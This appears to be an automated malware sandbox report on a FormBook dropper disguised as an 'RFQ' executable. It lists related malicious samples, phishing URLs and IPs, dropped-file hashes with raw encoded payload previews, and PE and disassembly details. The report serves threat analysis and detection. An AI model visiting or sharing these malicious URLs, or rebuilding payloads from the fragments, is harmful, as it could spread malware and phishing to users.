                                                                                                                                          PO No-5100002069 Sr. No. 11 & PO No-5100002072 Sr. No. 8,10,17..exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 172.67.177.220
                                                                                                                                          Y7isAhMKal.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 172.67.177.220
                                                                                                                                          INVOICE_PO# PUO202300054520249400661.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 104.21.83.154
                                                                                                                                          HT9324-25 1x40HC LDHFCLDEHAM29656 MRSU5087674.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 172.67.177.220
                                                                                                                                          19387759999PO-RFQ-INVOICE-doc.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 104.21.83.154
                                                                                                                                          OREN Engine Stores Requisition 4th quarter OREN-ES-2024-010 & OREN-ES-2024-011.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 172.67.177.220
                                                                                                                                          Due Payment Invoice PISS2024993.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 172.67.177.220
                                                                                                                                          mm.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 172.67.177.220
                                                                                                                                          FACTURA A-7507_H1758.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                          • 172.67.177.220
                                                                                                                                          www.ak711ka10.latRN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 154.23.181.7
                                                                                                                                          PO No-5100002069 Sr. No. 11 & PO No-5100002072 Sr. No. 8,10,17..exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 154.23.181.7
                                                                                                                                          INVOICE_PO# PUO202300054520249400661.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 154.23.181.7
                                                                                                                                          HT9324-25 1x40HC LDHFCLDEHAM29656 MRSU5087674.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 154.23.181.7
                                                                                                                                          OREN Engine Stores Requisition 4th quarter OREN-ES-2024-010 & OREN-ES-2024-011.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 154.23.181.7
                                                                                                                                          Due Payment Invoice PISS2024993.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 154.23.181.7
                                                                                                                                          bin.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 154.23.181.7

                                                                                                                                          ASNs

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          DV-PRIMARY-ASN1UShttps://google-databricks.com/?uniq_id=b92ZeoMGet hashmaliciousUnknownBrowse
                                                                                                                                          • 141.193.213.10
                                                                                                                                          http://track.reviewmgr.com/ls/click?upn=u001.W5y-2Fhe84rCuLxXDO470nfuKD2Iz98QeQpE-2BkxRR0H-2BqB5cDKklujIJ5FLru7QrAASOSa17vR-2FSCLVAx4lWyy5Q-3D-3DNnGv_Yp4ydSxZWNatis3HtI6bBrJjg57JYwT6kbyY2f89Z-2FBhxNJZyCBl9w6yXNV0YfiKUAGjaILaAN0mF43Ydvv3aAXjCPBMrYvHXhqj-2F90M8IWSluK-2FDr0h4-2FIbAXpExZIWOjtRSKBCrpvm-2BHKZd6Q2itOPvvv8Wh8uHJq1rbQgzA92MMGG0eeFCZzQMnosAWydLTI7R4yQPl90fJpGVjewvRcCF77tY5-2B3PAHwq6SU-2Fc2kSK8E1mMumIEdp0dsw2BfptVK6-2FXO4Hh-2FAV8-2FJ5YFUs6qp3oyRx3LiWrBnDVYrVE-3DGet hashmaliciousUnknownBrowse
                                                                                                                                          • 141.193.213.20
                                                                                                                                          https://alessiabelltravel.comGet hashmaliciousUnknownBrowse
                                                                                                                                          • 141.193.213.11
                                                                                                                                          RN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 141.193.213.11
                                                                                                                                          PO No-5100002069 Sr. No. 11 & PO No-5100002072 Sr. No. 8,10,17..exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 141.193.213.10
                                                                                                                                          https://bitcoinwisdom.com/these-workers-found-a-giant-snake-you-wont-believe-what-they-found-inside/2/?utm_source=taboola&utm_term=yahoo-aol-mail&utm_medium=cpc&utm_campaign=Snake+US.D_snake&cost=0.13&tblci=GiAmoZnDSKA9Rcvf4CX7BxL2zvlH6pqfvE-XRuuUPfhj0iCA4Woo2fPniM_m2u-_ATDYl18Get hashmaliciousLiteHTTP BotBrowse
                                                                                                                                          • 141.193.213.20
                                                                                                                                          ByuoedHi2e.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 141.193.213.10
                                                                                                                                          https://krtra.com/t/onJtp2YcgmoQGet hashmaliciousUnknownBrowse
                                                                                                                                          • 141.193.213.11
                                                                                                                                          INVOICE_PO# PUO202300054520249400661.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 141.193.213.10
                                                                                                                                          IbRV4I7MrS.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 141.193.213.11
                                                                                                                                          REGISTER-ASITMagnetnaalene.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                          • 195.110.124.133
                                                                                                                                          RN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 195.110.124.133
                                                                                                                                          glued.htaGet hashmaliciousFormBookBrowse
                                                                                                                                          • 195.110.124.133
                                                                                                                                          proforma Invoice.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 195.110.124.133
                                                                                                                                          DHL_doc.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 195.110.124.133
                                                                                                                                          INVOICE_PO# PUO202300054520249400661.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 195.110.124.133
                                                                                                                                          56ck70s0BI.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 195.110.124.133
                                                                                                                                          p4rsJEIb7k.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 195.110.124.133
                                                                                                                                          IMPORT PERMITS.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 195.110.124.133
                                                                                                                                          draft contract for order #782334.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 195.110.124.133
                                                                                                                                          AMAZON-02UShttps://lookerstudio.google.com/s/hvL5oZWBksgGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                                                          • 13.35.58.12
                                                                                                                                          S0FTWARE.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                          • 185.166.143.49
                                                                                                                                          https://dev.terraingroup.smithmarketing.com/n/?c3Y9bzM2NV8xX29uZSZyYW5kPVMyeEZVV0k9JnVpZD1VU0VSMDgxMTIwMjRVMDcxMTA4MzM=N0123Nbryan.allee@centraltrust.netGet hashmaliciousMamba2FABrowse
                                                                                                                                          • 13.35.58.91
                                                                                                                                          https://desertgarprodentalbdenmontessori.sharefile.com/public/share/web-sc0171e76f26940ab83813f90c639bcc9Get hashmaliciousUnknownBrowse
                                                                                                                                          • 76.223.1.166
                                                                                                                                          Invitation Letter from Ministry of Defence China.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 18.245.46.25
                                                                                                                                          https://google-databricks.com/?uniq_id=b92ZeoMGet hashmaliciousUnknownBrowse
                                                                                                                                          • 18.245.86.109
                                                                                                                                          Draft_Order_Form_6335_pdf_nsg.pdfGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                                                          • 13.35.58.71
                                                                                                                                          yakuza.i586.elfGet hashmaliciousMiraiBrowse
                                                                                                                                          • 54.188.223.161
                                                                                                                                          yakuza.arm4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                          • 54.217.84.115
                                                                                                                                          yakuza.i686.elfGet hashmaliciousMiraiBrowse
                                                                                                                                          • 3.127.110.58
                                                                                                                                          COGENT-174USRequerimento.exeGet hashmaliciousMeshAgentBrowse
                                                                                                                                          • 38.54.57.237
                                                                                                                                          yakuza.i586.elfGet hashmaliciousMiraiBrowse
                                                                                                                                          • 149.67.165.216
                                                                                                                                          yakuza.arm4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                          • 38.46.146.106
                                                                                                                                          yakuza.i686.elfGet hashmaliciousMiraiBrowse
                                                                                                                                          • 38.14.26.50
                                                                                                                                          http://xoilacxd.ccGet hashmaliciousUnknownBrowse
                                                                                                                                          • 143.244.56.49
                                                                                                                                          ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                          • 154.62.162.14
                                                                                                                                          arm4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                          • 154.54.124.139
                                                                                                                                          DHL SHIPPING CONFIRMATION-SAMPLES DELIVERY ADDRESS.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 206.119.81.214
                                                                                                                                          dvwkja7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                          • 206.238.176.234
                                                                                                                                          botnet.m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                          • 38.195.72.18

                                                                                                                                          JA3 Fingerprints

                                                                                                                                          No context

                                                                                                                                          Dropped Files

                                                                                                                                          No context

                                                                                                                                          Created / dropped Files

                                                                                                                                          C:\Users\user\AppData\Local\Temp\56Q8T4H

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):114688
                                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Temp\aut3F0E.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\Desktop\RFQ 3100185 MAHAD.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):287232
                                                                                                                                          Entropy (8bit):7.995170507748786
                                                                                                                                          Encrypted:true
                                                                                                                                          SSDEEP:6144:shgiSF63TtOf8zVK4sKIPzyvX1EyvnRjp1uBw/FgpmtiWGgu:s9SF6Uf8zVKGXW6nRjpgK/Fn0RZ
                                                                                                                                          MD5:671F92CD7EBEF27E8D0AF98B01B0B99B
                                                                                                                                          SHA1:19E347D204090D4224116CC4070F8C9024ED26F7
                                                                                                                                          SHA-256:EBF2B2822BB1E992A683BEA0B57FF00380CB49723B21950F3B4D7211A08F2A7D
                                                                                                                                          SHA-512:77BC8395B1B742F7F3A75D4392C44F81014E03E714409E58F6F42235BA0F89DEAD7CD574B555BA6E452631491DC9600A3BB2A44A2882616A9B6C56B9441DCD12
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:.lu..080V...E....z.FR..|D^..0SS080VW4QL3I5HF6FQIAXTGV6C60S.080XH._L.@.i.7..h.0=4vF1YW!2].S79Z>8.+Ph4C(q /x.....YT6}=5:rW4QL3I51G?.l)&.i'1.~VW.I...l7S.V...t&Q.K..h'1.._S;nP_.VW4QL3I5..6F.H@X.t.VC60SS080.W6PG2B5H.2FQIAXTGV6.%0SS 80V70QL3.5HV6FQKAXRGV6C60SU080VW4QLSM5HD6FQIAXVG..C6 SS 80VW$QL#I5HF6FAIAXTGV6C60SS080VW4QL3I5HF6FQIAXTGV6C60SS080VW4QL3I5HF6FQIAXTGV6C60SS080VW4QL3I5HF6FQIAXTGV6C60SS080VW4QL3I5HF6FQIAXTGV6C60SS080VW4QbG,M<F6FU.EXTWV6Cf4SS 80VW4QL3I5HF6FqIA8TGV6C60SS080VW4QL3I5HF6FQIAXTGV6C60SS080VW4QL3I5HF6FQIAXTGV6C60SS080VW4QL3I5HF6FQIAXTGV6C60SS080VW4QL3I5HF6FQIAXTGV6C60SS080VW4QL3I5HF6FQIAXTGV6C60SS080VW4QL3I5HF6FQIAXTGV6C60SS080VW4QL3I5HF6FQIAXTGV6C60SS080VW4QL3I5HF6FQIAXTGV6C60SS080VW4QL3I5HF6FQIAXTGV6C60SS080VW4QL3I5HF6FQIAXTGV6C60SS080VW4QL3I5HF6FQIAXTGV6C60SS080VW4QL3I5HF6FQIAXTGV6C60SS080VW4QL3I5HF6FQIAXTGV6C60SS080VW4QL3I5HF6FQIAXTGV6C60SS080VW4QL3I5HF6FQIAXTGV6C60SS080VW4QL3I5HF6FQIAXTGV6C60SS080VW4QL3I5HF6FQIAXTGV6C60SS080VW4QL3I5HF6FQIAXTGV6C60SS080VW4QL3I5HF6F

                                                                                                                                          C:\Users\user\AppData\Local\Temp\aut3F3E.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\Desktop\RFQ 3100185 MAHAD.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):14938
                                                                                                                                          Entropy (8bit):7.590832611638412
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:384:k9/R/83eQv0okBolpUnQDk5K8PdXTvJ6LiDu886pFpDIWfi:kR/83eQv0okBpQsHPdjvY+i/6pFra
                                                                                                                                          MD5:DD7A6F6236B6185D5067F0641D8803A8
                                                                                                                                          SHA1:5F13F2F671F61800F61F14F8385C97C3DE476D5F
                                                                                                                                          SHA-256:13DB4D7BDDF765D311B100303BBA9CFAC4F67F8064966A5075F84BB973DC538D
                                                                                                                                          SHA-512:569A237B963D1EA881211BAE514E591C36546F7A281C3120D6C4782D6B11116B7C62DC0AE5348A06A2AA947DCE2F899EF3FD7874E8A9B5DA0E584249B51F7DF7
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:EA06......3........SP.n......5e...`.....|....T...3...(.6&.....9vp.=...G.....7@..9......$..k...........c}V.....?.P...p...Y@Q?.{..'..c.D.&.N. .'.9e.D.&`...D..' ...D...s...D...S.(......sP...h...M.Q?.y..G.c.D....Q.......O......60..........vh...0.7..!.....)^...t.C........$..C......l>[......!....|.0...&d.....Hz..a....l?..uo.....P......V0....j......|......l.....A.?.. Bg.8.l.E..Ed.L...?.. Bg.....Y..>@.............@..'.....8|.?..u.........l. O..]e...O..!e...& ....#s.......3.Y....9.......9..M.7?............l?...F..........C7....g .........x2..8.a...?..j..+4.....W?..j....Y..M. ?.0....Q...d}S0{.......M.".@...Z........V....n.....Q>...'.N...r..(.-........0W.........(....... 6..p.....6zh......?.....O8....lCN....i..?..8}@L..E.i.....61...f#q....>.N....4..M.Q?.q.........D..0N..V.A..M.>K0i..d.h.&...%.Y...|.*..<..aw.].3c..H.@B?...G..1...' ....k|.A.O..#.....}V`....#..H|.P!..d....0z....Y..>K..G.*/....G.7c.H..b....W..1....?.01..b.!...@.?..o.F|....p9......S.!..nb.!....zb0..

                                                                                                                                          C:\Users\user\AppData\Local\Temp\porcelainize

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\Desktop\RFQ 3100185 MAHAD.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):287232
                                                                                                                                          Entropy (8bit):7.995170507748786
                                                                                                                                          Encrypted:true
                                                                                                                                          SSDEEP:6144:shgiSF63TtOf8zVK4sKIPzyvX1EyvnRjp1uBw/FgpmtiWGgu:s9SF6Uf8zVKGXW6nRjpgK/Fn0RZ
                                                                                                                                          MD5:671F92CD7EBEF27E8D0AF98B01B0B99B
                                                                                                                                          SHA1:19E347D204090D4224116CC4070F8C9024ED26F7
                                                                                                                                          SHA-256:EBF2B2822BB1E992A683BEA0B57FF00380CB49723B21950F3B4D7211A08F2A7D
                                                                                                                                          SHA-512:77BC8395B1B742F7F3A75D4392C44F81014E03E714409E58F6F42235BA0F89DEAD7CD574B555BA6E452631491DC9600A3BB2A44A2882616A9B6C56B9441DCD12
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:.lu..080V...E....z.FR..|D^..0SS080VW4QL3I5HF6FQIAXTGV6C60S.080XH._L.@.i.7..h.0=4vF1YW!2].S79Z>8.+Ph4C(q /x.....YT6}=5:rW4QL3I51G?.l)&.i'1.~VW.I...l7S.V...t&Q.K..h'1.._S;nP_.VW4QL3I5..6F.H@X.t.VC60SS080.W6PG2B5H.2FQIAXTGV6.%0SS 80V70QL3.5HV6FQKAXRGV6C60SU080VW4QLSM5HD6FQIAXVG..C6 SS 80VW$QL#I5HF6FAIAXTGV6C60SS080VW4QL3I5HF6FQIAXTGV6C60SS080VW4QL3I5HF6FQIAXTGV6C60SS080VW4QL3I5HF6FQIAXTGV6C60SS080VW4QL3I5HF6FQIAXTGV6C60SS080VW4QbG,M<F6FU.EXTWV6Cf4SS 80VW4QL3I5HF6FqIA8TGV6C60SS080VW4QL3I5HF6FQIAXTGV6C60SS080VW4QL3I5HF6FQIAXTGV6C60SS080VW4QL3I5HF6FQIAXTGV6C60SS080VW4QL3I5HF6FQIAXTGV6C60SS080VW4QL3I5HF6FQIAXTGV6C60SS080VW4QL3I5HF6FQIAXTGV6C60SS080VW4QL3I5HF6FQIAXTGV6C60SS080VW4QL3I5HF6FQIAXTGV6C60SS080VW4QL3I5HF6FQIAXTGV6C60SS080VW4QL3I5HF6FQIAXTGV6C60SS080VW4QL3I5HF6FQIAXTGV6C60SS080VW4QL3I5HF6FQIAXTGV6C60SS080VW4QL3I5HF6FQIAXTGV6C60SS080VW4QL3I5HF6FQIAXTGV6C60SS080VW4QL3I5HF6FQIAXTGV6C60SS080VW4QL3I5HF6FQIAXTGV6C60SS080VW4QL3I5HF6FQIAXTGV6C60SS080VW4QL3I5HF6FQIAXTGV6C60SS080VW4QL3I5HF6F

                                                                                                                                          C:\Users\user\AppData\Local\Temp\troopwise

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\Desktop\RFQ 3100185 MAHAD.exe
                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):172054
                                                                                                                                          Entropy (8bit):2.5829740719367096
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:oUjxaM/0OCHqz+Q/muxDkrWRyBcyedHnCvd50c2mkz8ZWclk4mNcYWpSFIO8TIfi:Q
                                                                                                                                          MD5:44B403A834E9BB8D1BBFFEA5566A250D
                                                                                                                                          SHA1:2CFD1BEC2462EE26E5EB723134C965CDB50B0D4F
                                                                                                                                          SHA-256:7231E1685A5E9D8FC3AE889709432AB49A6C23971E057B7F12B66524860BF6BD
                                                                                                                                          SHA-512:69A8CD868B043E926EDA226E58F2F90E8373E1A99D6070BC3D417F9A9FA100877B2DFD59778DFA4C5CC1D24CC353FFCD48C530F43DF1B46C404B581A9BA99096
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:52110052110x52110552110552110852110b52110e52110c52110852110152110e52110c52110c52110c52110052110252110052110052110052110052110552110652110552110752110b52110852110652110b52110052110052110052110052110052110052110652110652110852110952110452110552110852110452110b52110952110652110552110052110052110052110052110052110052110652110652110852110952110452110d52110852110652110b52110a52110752110252110052110052110052110052110052110052110652110652110852110952110552110552110852110852110b52110852110652110e52110052110052110052110052110052110052110652110652110852110952110452110552110852110a52110b52110952110652110552110052110052110052110052110052110052110652110652110852110952110452110d52110852110c52110b52110a52110652110c52110052110052110052110052110052110052110652110652110852110952110552110552110852110e52110b52110852110352110352110052110052110052110052110052110052110652110652110852110952110452110552110952110052110b52110952110352110252110052110052110052110052110052110052110652110652110852110952110452110d5211

                                                                                                                                          Static File Info

                                                                                                                                          General

                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Entropy (8bit):7.2113108262156596
                                                                                                                                          TrID:
                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                          File name:RFQ 3100185 MAHAD.exe
                                                                                                                                          File size:964'785 bytes
                                                                                                                                          MD5:1087c8d5903ea811bab4d2298e756592
                                                                                                                                          SHA1:5e8c9b371d41f125bca99458b3a22472d6225b88
                                                                                                                                          SHA256:0af4e0443ef67307163134b3fb9cbd5454cbfe00bd29ecf57573643be9b5fbd8
                                                                                                                                          SHA512:54aba1f68fd064cda0e22e7ce95465275dad383a592d03570aea69ff023a52c425955fc99b37901d33aaa6a8703267b22e9dbae3e7e993e0f18860734b0b724a
                                                                                                                                          SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCblV0LbqdU6QsDuo3zzL5L:7JZoQrbTFZY1iaCpVebv6QsDJ5L
                                                                                                                                          TLSH:7A25C021B5C68076C2B323B19E7FF76A963D69360336D19B27C82E315EA05416B39733
                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..

                                                                                                                                          File Icon

                                                                                                                                          Icon Hash:1733312925935517

                                                                                                                                          Static PE Info

                                                                                                                                          General

                                                                                                                                          Entrypoint:0x4165c1
                                                                                                                                          Entrypoint Section:.text
                                                                                                                                          Digitally signed:false
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          Subsystem:windows gui
                                                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                          Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                                                                                                          TLS Callbacks:
                                                                                                                                          CLR (.Net) Version:
                                                                                                                                          OS Version Major:5
                                                                                                                                          OS Version Minor:0
                                                                                                                                          File Version Major:5
                                                                                                                                          File Version Minor:0
                                                                                                                                          Subsystem Version Major:5
                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                          Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378

                                                                                                                                          Entrypoint Preview

                                                                                                                                          Instruction
                                                                                                                                          call 00007F29F09428BBh
                                                                                                                                          jmp 00007F29F093972Eh
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          push ebp
                                                                                                                                          mov ebp, esp
                                                                                                                                          push edi
                                                                                                                                          push esi
                                                                                                                                          mov esi, dword ptr [ebp+0Ch]
                                                                                                                                          mov ecx, dword ptr [ebp+10h]
                                                                                                                                          mov edi, dword ptr [ebp+08h]
                                                                                                                                          mov eax, ecx
                                                                                                                                          mov edx, ecx
                                                                                                                                          add eax, esi
                                                                                                                                          cmp edi, esi
                                                                                                                                          jbe 00007F29F09398AAh
                                                                                                                                          cmp edi, eax
                                                                                                                                          jc 00007F29F0939A46h
                                                                                                                                          cmp ecx, 00000080h
                                                                                                                                          jc 00007F29F09398BEh
                                                                                                                                          cmp dword ptr [004A9724h], 00000000h
                                                                                                                                          je 00007F29F09398B5h
                                                                                                                                          push edi
                                                                                                                                          push esi
                                                                                                                                          and edi, 0Fh
                                                                                                                                          and esi, 0Fh
                                                                                                                                          cmp edi, esi
                                                                                                                                          pop esi
                                                                                                                                          pop edi
                                                                                                                                          jne 00007F29F09398A7h
                                                                                                                                          jmp 00007F29F0939C82h
                                                                                                                                          test edi, 00000003h
                                                                                                                                          jne 00007F29F09398B6h
                                                                                                                                          shr ecx, 02h
                                                                                                                                          and edx, 03h
                                                                                                                                          cmp ecx, 08h
                                                                                                                                          jc 00007F29F09398CBh
                                                                                                                                          rep movsd
                                                                                                                                          jmp dword ptr [00416740h+edx*4]
                                                                                                                                          mov eax, edi
                                                                                                                                          mov edx, 00000003h
                                                                                                                                          sub ecx, 04h
                                                                                                                                          jc 00007F29F09398AEh
                                                                                                                                          and eax, 03h
                                                                                                                                          add ecx, eax
                                                                                                                                          jmp dword ptr [00416654h+eax*4]
                                                                                                                                          jmp dword ptr [00416750h+ecx*4]
                                                                                                                                          nop
                                                                                                                                          jmp dword ptr [004166D4h+ecx*4]
                                                                                                                                          nop
                                                                                                                                          inc cx
                                                                                                                                          add byte ptr [eax-4BFFBE9Ah], dl
                                                                                                                                          inc cx
                                                                                                                                          add byte ptr [ebx], ah
                                                                                                                                          ror dword ptr [edx-75F877FAh], 1
                                                                                                                                          inc esi
                                                                                                                                          add dword ptr [eax+468A0147h], ecx
                                                                                                                                          add al, cl
                                                                                                                                          jmp 00007F29F2DB20A7h
                                                                                                                                          add esi, 03h
                                                                                                                                          add edi, 03h
                                                                                                                                          cmp ecx, 08h
                                                                                                                                          jc 00007F29F093986Eh
                                                                                                                                          rep movsd
                                                                                                                                          jmp dword ptr [00000000h+edx*4]

                                                                                                                                          Rich Headers

                                                                                                                                          Programming Language:
                                                                                                                                          • [ C ] VS2010 SP1 build 40219
                                                                                                                                          • [C++] VS2010 SP1 build 40219
                                                                                                                                          • [ C ] VS2008 SP1 build 30729
                                                                                                                                          • [IMP] VS2008 SP1 build 30729
                                                                                                                                          • [ASM] VS2010 SP1 build 40219
                                                                                                                                          • [RES] VS2010 SP1 build 40219
                                                                                                                                          • [LNK] VS2010 SP1 build 40219

                                                                                                                                          Data Directories

                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9328.rsrc
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                          Sections

                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                          .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                          .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                          .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                          .rsrc0xab0000x93280x9400495451d7eb8326bd9fa2714869ea6de8False0.49002322635135137data5.541804843154628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                          Resources

                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                          RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                                                          RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                                                          RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                                          RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                                                                                                                          RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                                                                                                                          RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                                                                                                                          RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                                                                                                                          RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
